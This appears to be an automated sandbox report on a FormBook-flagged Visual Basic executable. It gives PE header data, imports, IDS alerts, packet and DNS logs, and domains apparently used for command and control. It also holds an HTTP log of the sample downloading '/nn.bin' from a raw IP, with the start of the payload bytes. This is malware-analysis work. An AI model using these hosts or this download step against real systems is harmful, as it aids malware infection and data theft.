                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x2c76.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x30
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000xd8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x12b340x13000False0.443860505757data6.26332938402IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .data0x140000x19cc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x160000x2c760x3000False0.409830729167data4.50318528506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0x17dce0xea8data
                                                              RT_ICON0x175260x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 2763565, next used block 3552051
                                                              RT_ICON0x16fbe0x568GLS_BINARY_LSB_FIRST
                                                              RT_ICON0x16cd60x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3207626755, next used block 12467
                                                              RT_ICON0x16bae0x128GLS_BINARY_LSB_FIRST
                                                              RT_ICON0x165460x668data
                                                              RT_GROUP_ICON0x164ec0x5adata
                                                              RT_VERSION0x161e00x30cdataChineseChina

                                                              Imports

                                                              DLLImport
                                                              USER32.DLLHideCaret
                                                              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                              Version Infos

                                                              DescriptionData
                                                              Translation0x0804 0x04b0
                                                              LegalCopyrightInternal Verify Number,88
                                                              InternalNameradikalitete
                                                              FileVersion1.00
                                                              CompanyNameInternal Verify Number,88
                                                              LegalTrademarksInternal Verify Number,88
                                                              ProductNameNETVRKBOLSJ
                                                              ProductVersion1.00
                                                              OriginalFilenameradikalitete.exe

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              ChineseChina

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              02/24/21-09:54:12.190743TCP2018752ET TROJAN Generic .bin download from Dotted Quad4971980192.168.2.345.153.203.193
                                                              02/24/21-09:54:57.474005TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.3104.18.194.20
                                                              02/24/21-09:54:57.474005TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.3104.18.194.20
                                                              02/24/21-09:54:57.474005TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.3104.18.194.20
                                                              02/24/21-09:55:13.924908ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                              02/24/21-09:55:16.956145ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                              02/24/21-09:55:23.618812TCP1201ATTACK-RESPONSES 403 Forbidden804973934.102.136.180192.168.2.3

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Feb 24, 2021 09:54:12.002202034 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.189910889 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.190150023 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.190742970 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.369791985 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369820118 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369832993 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369851112 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369868040 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369884968 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369900942 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369920015 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369921923 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.369937897 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369954109 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.369963884 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.369995117 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.569489002 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569533110 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569545984 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569561005 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569577932 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569593906 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569611073 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569611073 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.569631100 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569648981 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569653034 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.569665909 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569681883 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569698095 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569715023 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569724083 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.569760084 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.569772005 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569796085 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569813967 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.569814920 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569833040 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569873095 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569885015 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.569890022 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569910049 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.569936037 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.569960117 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767637968 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767668009 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767690897 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767699957 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767708063 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767724037 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767743111 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767750978 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767760992 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767777920 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767796993 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767807961 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767813921 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767829895 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767838955 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767846107 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767862082 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767865896 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767882109 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767890930 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767900944 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767918110 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767927885 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767935991 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767952919 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767967939 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.767975092 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.767985106 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768002033 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768002033 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768021107 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768029928 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768038988 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768054962 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768066883 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768071890 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768088102 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768102884 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768105984 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768120050 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768132925 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768136024 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768156052 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768172979 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768172979 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768188953 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768204927 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768217087 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768220901 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768235922 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768250942 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768251896 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768268108 CET804971945.153.203.193192.168.2.3
                                                              Feb 24, 2021 09:54:12.768280029 CET4971980192.168.2.345.153.203.193
                                                              Feb 24, 2021 09:54:12.768286943 CET804971945.153.203.193192.168.2.3

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Feb 24, 2021 09:53:38.820416927 CET4919953192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:38.872474909 CET53491998.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:39.689632893 CET5062053192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:39.738300085 CET53506208.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:40.483798981 CET6493853192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:40.535568953 CET53649388.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:41.264951944 CET6015253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:41.318134069 CET53601528.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:41.931977987 CET5754453192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:41.995696068 CET53575448.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:42.494555950 CET5598453192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:42.546268940 CET53559848.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:43.914186001 CET6418553192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:43.970808983 CET53641858.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:45.091188908 CET6511053192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:45.151494980 CET53651108.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:46.880861044 CET5836153192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:46.929522038 CET53583618.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:48.114321947 CET6349253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:48.162919044 CET53634928.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:48.996119022 CET6083153192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:49.044739962 CET53608318.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:49.969674110 CET6010053192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:50.018757105 CET53601008.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:50.844532967 CET5319553192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:50.906953096 CET53531958.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:51.634685993 CET5014153192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:51.683485985 CET53501418.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:52.593532085 CET5302353192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:52.642282009 CET53530238.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:54.106189966 CET4956353192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:54.157819033 CET53495638.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:55.101243973 CET5135253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:55.152909040 CET53513528.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:53:55.930907011 CET5934953192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:53:55.994014025 CET53593498.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:54:18.157432079 CET5708453192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:54:18.207755089 CET53570848.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:54:19.141072035 CET5882353192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:54:19.201199055 CET53588238.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:54:33.919852018 CET5756853192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:54:33.968363047 CET53575688.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:54:57.359049082 CET5054053192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:54:57.425810099 CET53505408.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:02.113053083 CET5436653192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:02.161890030 CET53543668.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:02.532022953 CET5303453192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:02.630068064 CET53530348.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:07.861970901 CET5776253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:08.872486115 CET5776253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:09.888163090 CET5776253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:10.069408894 CET5543553192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:10.133606911 CET53554358.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:11.904297113 CET5776253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:12.914405107 CET53577628.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:13.924789906 CET53577628.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:16.956064939 CET53577628.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:17.942914009 CET5071353192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:18.103657961 CET53507138.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:23.378793001 CET5613253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:23.437237978 CET53561328.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:27.097711086 CET5898753192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:27.178822041 CET53589878.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:28.649949074 CET5657953192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:28.842004061 CET53565798.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:34.560147047 CET6063353192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:34.773560047 CET53606338.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:37.848817110 CET6129253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:37.897572041 CET53612928.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:40.415353060 CET6361953192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:40.478564978 CET53636198.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:45.191891909 CET6493853192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:45.244132996 CET53649388.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:50.350162983 CET6194653192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:50.483732939 CET53619468.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:55.487298965 CET6491053192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:55.562167883 CET53649108.8.8.8192.168.2.3

                                                              ICMP Packets

                                                              TimestampSource IPDest IPChecksumCodeType
                                                              Feb 24, 2021 09:55:13.924907923 CET192.168.2.38.8.8.8cff7(Port unreachable)Destination Unreachable
                                                              Feb 24, 2021 09:55:16.956145048 CET192.168.2.38.8.8.8cff7(Port unreachable)Destination Unreachable

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Feb 24, 2021 09:54:57.359049082 CET192.168.2.38.8.8.80x4db0Standard query (0)www.hamiltonparkpdx.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:02.532022953 CET192.168.2.38.8.8.80xbf2fStandard query (0)www.readingqueens.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:07.861970901 CET192.168.2.38.8.8.80x1738Standard query (0)www.ibluebay3dwd.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:08.872486115 CET192.168.2.38.8.8.80x1738Standard query (0)www.ibluebay3dwd.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:09.888163090 CET192.168.2.38.8.8.80x1738Standard query (0)www.ibluebay3dwd.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:11.904297113 CET192.168.2.38.8.8.80x1738Standard query (0)www.ibluebay3dwd.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:17.942914009 CET192.168.2.38.8.8.80xafa2Standard query (0)www.winningscotland.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:23.378793001 CET192.168.2.38.8.8.80x566Standard query (0)www.kreatelymedia.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:28.649949074 CET192.168.2.38.8.8.80x7775Standard query (0)www.neuroacademyok.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:34.560147047 CET192.168.2.38.8.8.80xd9e5Standard query (0)www.india-vspakistanlive.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:45.191891909 CET192.168.2.38.8.8.80xd0e0Standard query (0)www.bloomingintoyou.comA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:50.350162983 CET192.168.2.38.8.8.80x6281Standard query (0)www.resp04.onlineA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:55.487298965 CET192.168.2.38.8.8.80x3ef6Standard query (0)www.process-activation.netA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Feb 24, 2021 09:54:57.425810099 CET8.8.8.8192.168.2.30x4db0No error (0)www.hamiltonparkpdx.comwww-hamiltonparkpdx-com.rentcafecn.comCNAME (Canonical name)IN (0x0001)
                                                              Feb 24, 2021 09:54:57.425810099 CET8.8.8.8192.168.2.30x4db0No error (0)www-hamiltonparkpdx-com.rentcafecn.comwww.rentcafecloudflaremvccn.comCNAME (Canonical name)IN (0x0001)
                                                              Feb 24, 2021 09:54:57.425810099 CET8.8.8.8192.168.2.30x4db0No error (0)www.rentcafecloudflaremvccn.com104.18.194.20A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:54:57.425810099 CET8.8.8.8192.168.2.30x4db0No error (0)www.rentcafecloudflaremvccn.com104.18.193.20A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:02.630068064 CET8.8.8.8192.168.2.30xbf2fNo error (0)www.readingqueens.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                              Feb 24, 2021 09:55:02.630068064 CET8.8.8.8192.168.2.30xbf2fNo error (0)ghs.googlehosted.com142.250.185.179A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:12.914405107 CET8.8.8.8192.168.2.30x1738Server failure (2)www.ibluebay3dwd.comnonenoneA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:13.924789906 CET8.8.8.8192.168.2.30x1738Server failure (2)www.ibluebay3dwd.comnonenoneA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:16.956064939 CET8.8.8.8192.168.2.30x1738Server failure (2)www.ibluebay3dwd.comnonenoneA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:18.103657961 CET8.8.8.8192.168.2.30xafa2No error (0)www.winningscotland.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                              Feb 24, 2021 09:55:18.103657961 CET8.8.8.8192.168.2.30xafa2No error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:23.437237978 CET8.8.8.8192.168.2.30x566No error (0)www.kreatelymedia.comkreatelymedia.comCNAME (Canonical name)IN (0x0001)
                                                              Feb 24, 2021 09:55:23.437237978 CET8.8.8.8192.168.2.30x566No error (0)kreatelymedia.com34.102.136.180A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:28.842004061 CET8.8.8.8192.168.2.30x7775No error (0)www.neuroacademyok.comneuroacademyok.comCNAME (Canonical name)IN (0x0001)
                                                              Feb 24, 2021 09:55:28.842004061 CET8.8.8.8192.168.2.30x7775No error (0)neuroacademyok.com23.111.137.154A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:34.773560047 CET8.8.8.8192.168.2.30xd9e5No error (0)www.india-vspakistanlive.com23.110.124.43A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:45.244132996 CET8.8.8.8192.168.2.30xd0e0No error (0)www.bloomingintoyou.combloomingintoyou.comCNAME (Canonical name)IN (0x0001)
                                                              Feb 24, 2021 09:55:45.244132996 CET8.8.8.8192.168.2.30xd0e0No error (0)bloomingintoyou.com192.0.78.25A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:45.244132996 CET8.8.8.8192.168.2.30xd0e0No error (0)bloomingintoyou.com192.0.78.24A (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:50.483732939 CET8.8.8.8192.168.2.30x6281Server failure (2)www.resp04.onlinenonenoneA (IP address)IN (0x0001)
                                                              Feb 24, 2021 09:55:55.562167883 CET8.8.8.8192.168.2.30x3ef6No error (0)www.process-activation.net109.68.33.25A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • 45.153.203.193
                                                              • www.hamiltonparkpdx.com
                                                              • www.readingqueens.com
                                                              • www.winningscotland.com
                                                              • www.kreatelymedia.com
                                                              • www.neuroacademyok.com
                                                              • www.india-vspakistanlive.com
                                                              • www.bloomingintoyou.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.34971945.153.203.19380C:\Users\user\Desktop\dwg.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 24, 2021 09:54:12.190742970 CET1327OUTGET /nn.bin HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Host: 45.153.203.193
                                                              Cache-Control: no-cache
                                                              Feb 24, 2021 09:54:12.369791985 CET1329INHTTP/1.1 200 OK
                                                              Content-Type: application/octet-stream
                                                              Last-Modified: Wed, 24 Feb 2021 03:41:51 GMT
                                                              Accept-Ranges: bytes
                                                              ETag: "4618dfc5ead71:0"
                                                              Server: Microsoft-IIS/10.0
                                                              Date: Wed, 24 Feb 2021 08:54:12 GMT
                                                              Content-Length: 164928
                                                              Data Raw: 8d d1 bf 5b 00 c1 30 8c 0f 47 55 6d 04 ff 9e f2 8b d9 f1 c5 a4 79 02 75 a1 e9 51 2a db 44 14 e9 46 0f ea 41 a3 07 de c0 3b 32 58 b4 e4 d8 fa 76 57 c9 d2 c4 70 92 18 84 9e e8 f4 eb e4 26 0a 23 f7 43 d4 f2 e9 43 42 f6 d3 0d ec c0 c1 f6 ce 7b 01 a1 2a 6c 86 7f e6 4c 94 0b af ee 95 a3 22 9c f4 69 a1 fd 64 6f 43 48 67 59 3a 9b da 41 e7 87 f8 79 40 65 4b 14 fb 0a 95 4f 21 86 75 52 55 51 06 2b 3b 48 11 01 9d 59 57 08 f4 4b 19 c4 0b fd f3 21 c9 8c 79 ec 99 18 e3 89 59 03 43 35 19 9d d8 d4 d9 66 94 84 33 a3 9a ba 34 5f fc 52 e1 ae 48 21 65 31 bc db ce 3c 57 1f b3 6a ef a6 9f e5 e3 50 e4 a9 ed a8 4c 98 4a cf 2f e1 1b e4 08 42 92 15 93 b7 e5 9e f6 c0 ad 0b 1e f9 44 e3 99 0e f8 af 4b 05 60 b3 f7 3c 1f 98 cc f7 f0 0c 72 99 f8 83 14 c2 23 0d 7d bc db f5 a1 85 2e 26 80 70 5c ab 78 2a f6 a1 44 a2 5b 48 47 17 34 2d 85 f3 42 4f a4 1d 15 7e 26 17 18 3b 31 bb 73 50 09 4c d5 6f ea 36 a1 f6 82 7b 26 1f c0 f7 b6 79 48 79 31 d8 7a f2 05 48 5b 6d f1 b2 74 8c f5 64 36 75 8a 27 80 17 55 da 9a 83 ca b4 79 fd 8d 02 9e 05 d4 96 e5 f0 3f 3f cc 4e c9 c0 91 67 b8 71 98 45 5c e5 4c 84 d9 6e 96 f8 38 9d a6 4f 61 cf cf d1 5a cf 90 0d 13 01 65 eb 0e c3 8e 9a 87 f2 ce d2 82 6b ff 0a 0a 98 61 41 c0 5a 3a 72 a5 1a a4 c6 64 fc 26 8b c7 92 96 c4 91 b7 12 1f d4 64 7a 1d 1b b3 66 10 ef cb 46 cc 74 3f 9f 46 ff e5 4c 35 4f 03 3c c7 8d 50 56 87 19 cd 09 c8 bb 04 a1 bf ca ca f6 61 2d 5a cc 3a 07 3d 44 71 bc 21 a4 bb d0 d4 f9 02 ba 28 8b 73 ea 16 26 7b 4f 1d 69 54 3b 79 26 9c db 10 63 